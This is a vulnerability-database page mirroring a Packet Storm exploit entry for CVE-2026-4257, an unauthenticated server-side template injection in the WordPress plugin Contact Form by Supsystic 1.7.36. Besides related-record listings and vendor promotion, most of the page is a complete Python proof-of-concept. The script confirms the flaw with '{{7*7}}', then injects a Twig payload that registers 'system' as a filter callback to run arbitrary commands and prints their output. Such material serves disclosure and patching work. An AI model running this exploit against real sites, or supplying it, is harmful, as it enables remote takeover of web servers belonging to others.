Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

๐Ÿ“„ Contact Form by Supsystic 1.7.36 Server-Side Template Injection

๐Ÿ—“๏ธย 11 May 2026ย 00:00:00Reported byย Groovy MarkTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 82ย Views

SSTS on Supsystic Contact Form 1.7.36 enables server-side template injection and remote command execution.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for CVE-2026-4257
18 Apr 202619:39
โ€“githubexploit
GithubExploit		Exploit for CVE-2026-4257
11 May 202605:24
โ€“githubexploit
ATTACKERKB		CVE-2026-4257
30 Mar 202621:26
โ€“attackerkb
Circl		CVE-2026-4257
30 Mar 202622:20
โ€“circl
CNNVD		WordPress plugin Contact Form by Supsystic ไปฃ็ ๆณจๅ…ฅๆผๆดž
30 Mar 202600:00
โ€“cnnvd
CVE		CVE-2026-4257
30 Mar 202621:26
โ€“cve
Cvelist		CVE-2026-4257 Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality
30 Mar 202621:26
โ€“cvelist
Exploit DB		WordPress Plugin Supsystic Contact Form 1.7.36 - SSTI
14 May 202600:00
โ€“exploitdb
EUVD		EUVD-2026-17239
31 Mar 202600:31
โ€“euvd
Metasploit		Supsystic Contact Form Wordpress Plugin SSTI RCE
26 May 202619:01
โ€“metasploit
Rows per page
import requests
    import argparse
    import re
    import urllib.parse
    
    def check_ssti(url, field_name):
        print(f"[*] Testing SSTI on {url} with field {field_name}...")
        
        # Simple arithmetic test
        test_payload = "{{7*7}}"
        params = {
            "cfsPreFill": "1",
            field_name: test_payload
        }
        target_url = f"{url}?{urllib.parse.urlencode(params)}"
        
        try:
            response = requests.get(target_url, verify=False, timeout=10)
            if "49" in response.text:
                print("[+] SSTI confirmed! Found '49' in response.")
                return True
            else:
                print("[-] SSTI test failed. '49' not found in response.")
                return False
        except Exception as e:
            print(f"[-] Error: {e}")
            return False
    
    def trigger_rce(url, field_name, command):
        print(f"[*] Triggering RCE: {command}")
        
        # Payload to register system as a filter callback and then call it
        # We use forms.params.fields.1.value and fields.2.value to avoid quote escaping
        # last_name will be 'system', email will be the command
        payload = "{{_self.env.registerUndefinedFilterCallback(forms.params.fields.1.value)}}{{_self.env.getFilter(forms.params.fields.2.value)}}"
        
        params = {
            "cfsPreFill": "1",
            field_name: payload,
            "last_name": "system",
            "email": command
        }
        
        target_url = f"{url}?{urllib.parse.urlencode(params)}"
        
        try:
            response = requests.get(target_url, verify=False, timeout=10)
            print(f"[*] Response Status: {response.status_code}")
            
            # Look for common patterns in the response that might indicate success
            # The output usually appears in the 'value' attribute of the first field
            match = re.search(r'name="fields\[' + field_name + r'\]" value="([^"]+)"', response.text)
            if match:
                print(f"[!] RCE SUCCESS! Output:")
                print(f"----------------------------------------")
                print(match.group(1))
                print(f"----------------------------------------")
                return True
            else:
                print("[-] Could not find command output in response. Check the response body manually.")
                return False
        except Exception as e:
            print(f"[-] Error: {e}")
            return False
    
    if __name__ == "__main__":
        print("""
    CVE-2026-4257
    Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection via Prefill Functionality
    
    -------------------------------------------------
        """)
        
        parser = argparse.ArgumentParser(description="PoC for CVE-2026-4257 (SSTI to RCE in Contact Form by Supsystic)")
        parser.add_argument("-u", "--url", required=True, help="URL of the page with the form")
        parser.add_argument("-f", "--field", required=True, help="Name of the form field (e.g., first_name)")
        parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute")
        
        args = parser.parse_args()
        
        if check_ssti(args.url, args.field):
            trigger_rce(args.url, args.field, args.cmd)

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 May 2026 00:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.19.8
EPSS0.41475
SSVC
server side template injectionremote command executionsupsystic contact formcontact form vulnerability
82